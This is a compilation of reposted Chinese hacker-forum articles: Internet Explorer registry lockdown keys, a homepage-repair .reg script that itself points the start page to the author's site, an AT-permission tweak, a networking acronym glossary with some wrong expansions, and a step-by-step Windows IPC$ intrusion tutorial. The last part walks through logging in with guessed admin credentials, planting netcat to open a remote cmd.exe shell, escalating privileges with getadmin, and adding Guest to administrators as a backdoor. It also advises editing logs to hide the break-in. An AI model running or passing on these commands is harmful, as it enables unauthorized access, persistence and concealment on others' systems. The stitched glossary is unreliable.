A F**k Page

转自E.S.T

信息来源：中国暗域网络内存

IE属性部分

禁用常规页

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为GeneralTab的DWORD，然后赋值为: 1 (0×1)即可。

禁用更改主页设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为HomePage的DWORD，然后赋值为: 1 (0×1)即可

禁用更改辅助功能设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Accessibility的DWORD，然后赋值为: 1 (0×1)即可

禁用更改临时文件的设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Cache的DWORD，然后赋值为: 1 (0×1)即可

禁用更改颜色设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Colors的DWORD，然后赋值为: 1 (0×1)即可

禁用更改字体设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Fonts的DWORD，然后赋值为: 1 (0×1)即可

禁用更改语言设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Languages的DWORD，然后赋值为: 1 (0×1)即可

禁用更改链接颜色

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为links的DWORD，然后赋值为: 1 (0×1)即可

禁用更改历史纪录设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为History的DWORD，然后赋值为: 1 (0×1)即可

禁用安全项

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为SecurityTab的DWORD，然后赋值为: 1 (0×1)即可

禁用内容项

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为ContentTab的DWORD，然后赋值为: 1 (0×1)即可

禁用更改分级设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Ratings的DWORD，然后赋值为: 1 (0×1)即可

禁用更改证书设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Certificates的DWORD，然后赋值为: 1 (0×1)即可

禁用表单的自动完成功能

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为formSuggest的DWORD，然后赋值为: 1 (0×1)即可

禁用自动完成保存密码

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为formSuggest Passwords的DWORD，然后赋值为: 1 (0×1)即可

禁止更改配置文件助理设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Profiles的DWORD，然后赋值为: 1 (0×1)即可

禁用连接项

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为ConnectionsTab的DWORD，然后赋值为: 1 (0×1)即可

对拨号连接实行“自动检测”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings下新建一个名为DialupAutodetect的DWORD，然后赋值为: 1 (0×1)即可

禁用缓存自动代理脚本

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings下新建一个名为EnableAutoProxyResultCache的DWORD，然后赋值为: 0 (0)即可

禁用更改连接设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Connection Settings的DWORD，然后赋值为: 1 (0×1)即可

禁用Internet连接向导

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Connwiz Admin Lock的DWORD，然后赋值为: 1 (0×1)即可

禁用更改代理服务器设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Proxy的DWORD，然后赋值为: 1 (0×1)即可

显示有关代理脚本下载失败的出错信息

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings下新建一个名为DisplayScriptDownloadFailureUI的DWORD，然后赋值为: 1 (0×1)即可

禁用程序项

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为ProgramsTab的DWORD，然后赋值为: 1 (0×1)即可

禁用更改默认浏览器检查

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Check_If_Default的DWORD，然后赋值为: 1 (0×1)即可

禁用更改日历和联系人的设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为CalendarContact的DWORD，然后赋值为: 1 (0×1)即可

禁止更改邮件设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Messaging的DWORD，然后赋值为: 1 (0×1)即可

禁用“重置Web设置”功能

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为ResetWebSettings的DWORD，然后赋值为: 1 (0×1)即可

禁用高级项

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为AdvancedTab的DWORD，然后赋值为: 1 (0×1)即可

禁用更改高级页设置

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下新建一个名为Advanced的DWORD，然后赋值为 (0×1)即可

禁止用户使用标示

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Identities下新建一个名为Locked Down的DWORD，然后赋值为: 1 (0×1)即可

设置Internet Explorer的菜单

“文件”菜单

禁用“另存为……”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoBrowserSaveAs的DWORD，然后赋值为: 1 (0×1)即可

禁用另存为“Web页，全部”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoBrowserSaveWebComplete的DWORD，然后赋值为: 1 (0×1)即可

禁用关闭浏览器

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoBrowserClose的DWORD，然后赋值为: 1 (0×1)即可

禁用“新建”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoFileNew的DWORD，然后赋值为: 1 (0×1)即可

禁用“打开”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoFileOpen的DWORD，然后赋值为: 1 (0×1)即可

“查看”菜单

禁用“全屏”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoTheaterMode的DWORD，然后赋值为: 1 (0×1)即可

禁用“源文件”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoViewSource的DWORD，然后赋值为: 1 (0×1)即可

禁用自定义工具栏的按钮

在HKEY_LOCAL_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下新建一个名为NoBandCustomize的DWORD，然后赋值为: 1 (0×1)即可

禁用自定义工具栏

在HKEY_LOCAL_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下新建一个名为NoToolbarCustomize的DWORD，然后赋值为: 1 (0×1)即可

“收藏”菜单

禁用“收藏”菜单

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoFavorites的DWORD，然后赋值为: 1 (0×1)即可

禁用添加频道

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoAddingChannels的DWORD，然后赋值为: 1 (0×1)即可

禁用添加脱机页计划

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoAddingSubscriptions的DWORD，然后赋值为: 1 (0×1)即可

禁用脱机页记数

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoChannelLogging的DWORD，然后赋值为: 1 (0×1)即可

禁用频道界面

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoChannelUI的DWORD，然后赋值为: 1 (0×1)即可

禁用编辑和创建计划组

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoEditingScheduleGroups的DWORD，然后赋值为: 1 (0×1)即可

禁用编辑脱机页计划

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodeliver\Restrictions下新建一个名为NoEditingSubscriptions的DWORD，然后赋值为: 1 (0×1)即可

禁用删除频道

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoRemovingChannels的DWORD，然后赋值为: 1 (0×1)即可

禁用删除脱机页计划

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodeliver\Restrictions下新建一个名为NoRemovingSubscriptions的DWORD，然后赋值为: 1 (0×1)即可

禁用所有已计划的脱机页

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodeliver\Restrictions下新建一个名为NoScheduledUpdates的DWORD，然后赋值为: 1 (0×1)即可

禁用下载站点预定内容

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\InfodeliveryRestrictions下新建一个名为NoSubscriptionContent的DWORD，然后赋值为: 1 (0×1)即可

“工具”菜单

禁用“Internet选项”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoBrowserOptions的DWORD，然后赋值为: 1 (0×1)即可

“帮助”菜单

禁用“Netscape用户”菜单

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoHelpItemNetscapeHelp的DWORD，然后赋值为: 1 (0×1)即可

禁用“每日提示”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoHelpItemTipOfTheDay的DWORD，然后赋值为: 1 (0×1)即可

禁用“教程”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoHelpItemTutorial的DWORD，然后赋值为: 1 (0×1)即可

禁用“发送反馈意见”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoHelpItemSendFeedback的DWORD，然后赋值为: 1 (0×1)即可

其它

禁用鼠标右键

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoBrowserContextMenu的DWORD，然后赋值为: 1 (0×1)即可

禁用“在新窗口打开”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoOpeninNewWnd的DWORD，然后赋值为: 1 (0×1)即可

禁用“将该程序保存到磁盘”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoSelectDownloadDir的DWORD，然后赋值为: 1 (0×1)即可

禁用自定义搜索

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery Restrictions下新建一个名为NoSearchCustomization的DWORD，然后赋值为: 1 (0×1)即可

禁用IE的外部商标

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoExternalBranding的DWORD，然后赋值为: 1 (0×1)即可

禁用F3的查找功能

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoFindFiles的DWORD，然后赋值为: 1 (0×1)即可

禁用IE组件自动安装

在HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Infodelivery下新建一个名为Restrictions\NoJITSetup的DWORD，然后赋值为: 1 (0×1)即可

禁用显示初始屏幕

在HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoSplash的DWORD，然后赋值为: 1 (0×1)即可

禁用检查IE更新

在HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions下新建一个名为NoUpdateCheck的DWORD，然后赋值为: 1 (0×1)即可

其中，禁用“Internet选项”

在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions下新建一个名为NoBrowserOptions的DWORD，然后赋值为: 1 (0×1)即可

我们来制作下面这个注册表脚本（合并到注册表即可解决此问题）：

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]

"Window Title"="Microsoft Internet Explorer"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

"Window Title"="Microsoft Internet Explorer"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

"Start Page"="http://hackercn.6to23.com"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]

"Start Page"="http://hackercn.6to23.com"

[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel]

"HomePage"=dword:00000000

原理：卑鄙网站通过修改homepage值（改DWORD值为字符串值）禁止通过面板修改主页。

下载已做好的注册表文件禁止通过面板修改主页和工具栏广告的修复

在以上注册表脚本中第一项是解决注册表被禁用的问题，第二、三项是去除IE工具栏上的广告,第四、五项将修改后的主页修复（默认的是我的主页：）不介意吧！你可以设置成空白页"Start Page"="about:blank"），第六项是解决禁止通过面板修改主页问题。

转自E.S.T

信息来源：HACKWAY

通常情况下只有管理员才可以使用AT命令，有时也可能会希望服务器操作员也能够运行AT命令，那么就要修改注册表：

1．启动注册表编辑器；

2．找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa；

3．在“编辑”菜单中选择“New Dword”；

4．取名"SubmitControl"，按回车；

5．双击名字后给字赋值1；

6．退出注册表编辑器，重新启动计算机。

在此过程完成后，您可以需要更新您的紧急修复盘。

转自E.S.T

文章出处: Swords Home In Net

ADSL: Asymmetric Digital Subscriber Line，不对称数字订阅线路

AH: Authentication Header，鉴定文件头

AMR（Audio/Modem Riser，音效/数据主机板附加直立插卡）

ARP（Address Resolution Protocol，地址解析协议）

ATM（Asynchronous Transfer Mode，异步传输模式）

BOD（Bandwidth On Demand，弹性带宽运用）

CBR（Committed Burst Rate，约定突发速率）

CCIRN: Coordinating Committee for Intercontinental Research Networking，洲际研究网络协调委员会

CCM（Call Control Manager，拨号控制管理）

CDSL: Consumer Digital Subscriber Line（消费者数字订阅线路）

CGI（Common Gateway Interface，通用网关接口）

CIEA: Commercial Internet Exchange Association，商业因特网交易协会

CIR（Committed Infomation Rate，约定信息速率）

CTS（Clear to Send，清除发送）

DBS-PC: Direct Broadcast Satellite PC（人造卫星直接广播式PC）

DCE: Data Circuit Terminal Equipment，数据通信设备

DES: Data Encryption Standard，数据加密标准

DMT: Discrete Multi - Tone，不连续多基频模式

DNS（Domain Name System，域名系统）

DOCSIS（Data Over Cable Service Interface Specifications，线缆服务接口数据规格）

DTE: Data Terminal Equipment，数据终端设备

EBR（Excess Burst Rate，超额突发速率）

ESP: Encapsulating Security Payload，压缩安全有效载荷

FDM: Frequency Division Multi，频率分离

Flow-control流控制

FRICC: Federal Research Internet Coordinating Committee，联邦调查因特网协调委员会

FTP（File Transfer Protocol，文件传输协议）

Ghost:（General Hardware Oriented System Transfer，全面硬件导向系统转移）

HDSL: High bit rate DSL，高比特率数字订阅线路

HTTP（HyperText Transfer Protocol，超文本传输协议）

ICMP（Internet Control Message Protocol，因特网信息控制协议）

IETF（Internet Engineering Task Framework，因特网工程任务组）

IKE: Internet Key Exchange，因特网密钥交换协议

IMAP4: Internet Message Access Protocol Version 4，第四版因特网信息存取协议

Internet（因特网）

IP（Internet Protocol，网际协议）

ISDN（Integrated Service Digital Network，综合服务数字网络）

ISOC: Internet Society，因特网协会

ISP（Internet Service Provider，因特网服务提供商）

LAN（Local Area Network，局域网）

LDAP: Lightweight Directory Access Protocol，轻权目录访问协议

LOM（LAN-on-Montherboard）

IAB: Internet Activities Board，因特网工作委员会

IETF: Internet Engineering Task Force，因特网工程作业推动

L2TP（Layer 2 Tunneling Protocol，二级通道协议）

LMDS: Local Multipoint Distributed System，局域多点分布式系统

MIME: Multipurpose Internet Mail Extension，多用途因特网邮件扩展协议

MNP: Microcom Networking Protocal

MODEM（Modulator Demodulator，调制解调器）

NAT（Network Address Translation，网络地址转换）

NC（Network Computer，网络计算机）

NDS: Novell Directory Service，Novell目录服务

NNTP: Network News Transfer Protocol，网络新闻传输协议

MSN: Microsoft Network，微软网络

OFDM（orthogonal frequency division multiplexing，直角频率部分多路复用）

P3P（Privacy Preference Project，个人私隐安全平台）

PDS: Public Directory Support，公众目录支持

PGP: Pretty Good Privacy，优良保密协议

PICS: Platform for Internet Content Selection，因特网内容选择平台

POF: Polymer Optical Fiber，聚合体光纤

POP3: Post Office Protocol Version 3，第三版电子邮局协议

PPTP: Point to Point Tunneling Protocol，点对点通道协议

RADSL: Rate Adaptive DSL，速率自适应数字订阅线路

RARP（Reverse Address Resolution Protocol，反向地址解析协议）

RDF: Resource Description Framework，资源描述框架

RSA（Rivest Shamir Adlemen，一种因特网加密和认证体系）

RTS（Request To Send，需求发送）

SIS: Switched Internetworking Services（交换式网络互联服务）

S/MIME: Secure MIME，安全多用途因特网邮件扩展协议

SNMP（Simple Network Management Protocol，简单网络管理协议）

SMTP（Simple Mail Transfer Protocol，简单邮件传输协议）

SKIP: Simple Key Exchange Internet Protocol，因特网简单密钥交换协议

SUA（Single User Account，单用户帐号）

TCP（Transmission Control Protocol，传输控制协议）

UART（Universal Asynchronous Receiver/Transmitter，通用异步接收/发送装置）

UDP（User Datagram Protocol，用户数据报协议）

ULS: User Location Service，用户定位服务

VOD: Video On Demand，视频点播

VPN: virtual private network, 虚拟局域网

转自中国邪恶八进制

来源：西部安全信息网

IPC是Internet Process Connection的缩写，也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能，特点是在同一时间内，两个IP之间只允许建立一个连接。好了，废话少说，现在进入主题。

如何找到具有IPC漏洞的主机呢？以前我都是组合一个国外的扫描工具（名字我忘了）和KillUSA的LetMeIn，因为很多工作都是手工完成的，所以速度可想而知了。现在因为有了小榕的流光2000，所以找到这样的主机实在是太简单了，具体操作我就不说了，大家可以参考该软件的说明文档。

好了，假设我们已经找到了一台这样的主机，地址是139.223.200.xxx，管理员帐号是Administrator，密码是123456。进入命令行方式，正式开工。需要说明的是，以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。

F:\>net use 9.223.200.xxx\ipc$ "123456" /user:"Administrator"

命令成功完成。

F:\>copy nc.exe 9.223.200.xxx\admin$

已复制 1 个文件。

F:\>net time 9.223.200.xxx

9.223.200.xxx 的当前时间是 2000/12/25 上午 10:25

在 9.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35

命令成功完成。

F:\>at 9.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe

新增加了一项作业，其作业 ID = 0

F:\>telnet 139.223.200.xxx 1234

上面的命令很简单，你只要参考一下net，at和nc的用法就可以了。这样，我们就登上了远程的主机。最理想的情况是这样的，但是，也许你会遇到目标主机的Schedule服务没有启动的情况，那么，at命令就不能用了，我们就需要增加以下步骤。

F:\>at 9.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe

服务仍未启动。

F:\>netsvc 9.223.200.xxx schedule /start

Service is running on 9.223.200.xxx

登上远程主机之后，我们可以做什么呢？这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话，可以试试下面的步骤。首先在本地执行下面的命令。

F:\>copy getadmin.exe 9.223.200.xxx\admin$

已复制 1 个文件。

F:\>copy gasys.dll 9.223.200.xxx\admin$

已复制 1 个文件。

其次，在远程主机运行下面的命令。

C:\WINNT\system32>getadmin

如果成功的话，你就是这台主机的管理员了，权限够大了吧？：-）

那么，现在我们能做什么呢？改主页？下载SAM数据库？都可以啦！方法有很多，我就不一一说了，具体方法可以参考相关教程。我一般对目标主机上的WORD文档和数据库比较感兴趣，呵呵。。。

其实，如果你在这台机子上面放个木马或者病毒什么的东东，做起事来更容易一些，但是我觉得如果你跟他没什么深仇大恨的话，还是不要这么做了，这样不好。

作完了你要做的事，不要忘了做个后门。

C:\WINNT\system32>net user Guest 30906766

net use Guest 30906766

The command completed successfully.

C:\WINNT\system32>net localgroup administrators Guest /add

net localgroup administrators Guest /add

The command completed successfully.

这是个比较简单的后门，要想做的更好一些，可以象Linux那样，做出一套RootKits来，其实这样的东东目前已经有了，你只要拿来用就可以了。现在搞破坏真是简单多了，那么多的傻瓜工具任你用，哎！要想自保，不学点安全知识怎么行呢？

最后，我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志，但是我想修理一下还是有用的。NT的日志在什么地方呢？可以参考XUDI的文章。但是有一点要记住的是，日志只能修改，不能删除，否则就是自己把自己出卖了！：-）这方面的命令行工具也不少，你可以到一些国外的站点去看看。

其实有了这台主机，你还可以做的更多。